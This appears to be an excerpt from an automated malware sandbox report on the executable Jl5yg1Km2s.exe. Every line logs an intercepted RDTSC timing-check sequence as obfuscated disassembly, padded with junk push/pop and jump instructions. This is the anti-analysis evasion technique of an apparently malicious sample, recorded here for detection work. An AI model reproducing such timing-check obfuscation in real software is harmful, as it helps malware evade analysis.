                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2027D second address: C20281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C20281 second address: C20287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C20AC9 second address: C20AD3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C20AD3 second address: C20AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C4AAA2 second address: C4AAAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F1CC8BB7C36h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C4AAAC second address: C4AAEE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jg 00007F1CC8B8C9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F1CC8B8C9EEh 0x00000012 push eax 0x00000013 pop eax 0x00000014 jc 00007F1CC8B8C9E6h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1CC8B8C9F4h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F1CC8B8C9ECh 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C4AAEE second address: C4AAF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C4AAF2 second address: C4AAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C4AF4A second address: C4AF64 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F1CC8BB7C40h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C4B544 second address: C4B54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C50FF5 second address: C50FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C50FF9 second address: C5103C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F1CC8B8C9F9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F1CC8B8C9F2h 0x00000011 pushad 0x00000012 jp 00007F1CC8B8C9EEh 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C5103C second address: C5104B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1CC8BB7C36h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C5104B second address: C5104F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C4FDCA second address: C4FDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C4FF5E second address: C4FF63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C4FACD second address: C4FAD7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C4FAD7 second address: C4FAF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9F2h 0x00000009 jg 00007F1CC8B8C9E6h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C585A9 second address: C585C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C43h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C5746E second address: C5747F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007F1CC8B8C9E6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C5772B second address: C57738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F1CC8BB7C3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C57877 second address: C5789A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1CC8B8C9E6h 0x00000008 jmp 00007F1CC8B8C9F9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C5789A second address: C578D6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1CC8BB7C4Eh 0x00000008 je 00007F1CC8BB7C36h 0x0000000e jmp 00007F1CC8BB7C42h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1CC8BB7C3Dh 0x0000001c jmp 00007F1CC8BB7C3Bh 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C57CEF second address: C57D0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F1CC8B8C9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1CC8B8C9F0h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C57D0F second address: C57D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C58402 second address: C58408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C58408 second address: C5840C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C5B618 second address: C5B631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jl 00007F1CC8B8C9ECh 0x0000000d jng 00007F1CC8B8C9E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C5B631 second address: C5B635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C613D7 second address: C613E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C636F7 second address: C6371E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CC8BB7C3Ch 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C69232 second address: C69236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C69236 second address: C6923C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C693A5 second address: C693A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C693A9 second address: C693B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C6B56F second address: C6B57A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C6B57A second address: C6B586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1CC8BB7C36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C6B586 second address: C6B58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C6B58B second address: C6B59A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Bh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C6E573 second address: C6E57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C6E57E second address: C6E584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C6E584 second address: C6E5A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F6h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C6E5A0 second address: C6E5D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1CC8BB7C43h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C6DD11 second address: C6DD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F1CC8B8C9F6h 0x0000000f pop eax 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C6E01D second address: C6E034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007F1CC8BB7C38h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F1CC8BB7C36h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C73E87 second address: C73E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C73E8B second address: C73E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C72C8C second address: C72CC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F1CC8B8C9EFh 0x0000000a jmp 00007F1CC8B8C9F9h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C72CC6 second address: C72CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C72E33 second address: C72E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C72F8A second address: C72F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1CC8BB7C36h 0x0000000a jns 00007F1CC8BB7C36h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C72F9C second address: C72FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C72FA1 second address: C72FC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C49h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C72FC0 second address: C72FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C204A6 second address: C20515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F1CC8BB7C38h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov edi, edx 0x00000026 push edx 0x00000027 mov dword ptr [ebp+122D2F06h], esi 0x0000002d pop ecx 0x0000002e push 00000004h 0x00000030 ja 00007F1CC8BB7C49h 0x00000036 nop 0x00000037 pushad 0x00000038 push ecx 0x00000039 push eax 0x0000003a pop eax 0x0000003b pop ecx 0x0000003c pushad 0x0000003d jmp 00007F1CC8BB7C45h 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C760EF second address: C760F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C760F3 second address: C76108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7D886 second address: C7D8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9F3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1CC8B8C9ECh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7B7C3 second address: C7B7D1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7B7D1 second address: C7B7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9F0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7B7E7 second address: C7B806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C45h 0x00000009 popad 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7BA99 second address: C7BAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jp 00007F1CC8B8C9E6h 0x00000010 jnl 00007F1CC8B8C9E6h 0x00000016 popad 0x00000017 popad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7BAB6 second address: C7BAC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1CC8BB7C36h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7BAC0 second address: C7BAC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7BD3D second address: C7BD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7BD43 second address: C7BD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7BD48 second address: C7BD5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7BD5D second address: C7BD81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1CC8B8C9F1h 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7C98D second address: C7C991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7D003 second address: C7D007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7D007 second address: C7D00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7D5D5 second address: C7D5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C83091 second address: C83095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C83095 second address: C830A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F1CC8B8C9E6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C830A7 second address: C830AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C830AD second address: C830B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C870B7 second address: C870C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F1CC8BB7C36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C870C3 second address: C870CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C870CB second address: C870CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C870CF second address: C870E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C870E0 second address: C8710C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CC8BB7C47h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C86255 second address: C86267 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1CC8B8C9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C86674 second address: C8668E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8668E second address: C86692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C867DC second address: C867E6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1CC8BB7C3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C867E6 second address: C867EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C86C5F second address: C86C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C86C63 second address: C86C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C86C6E second address: C86CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007F1CC8BB7C48h 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 je 00007F1CC8BB7C36h 0x0000001b jno 00007F1CC8BB7C36h 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C86CA6 second address: C86CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
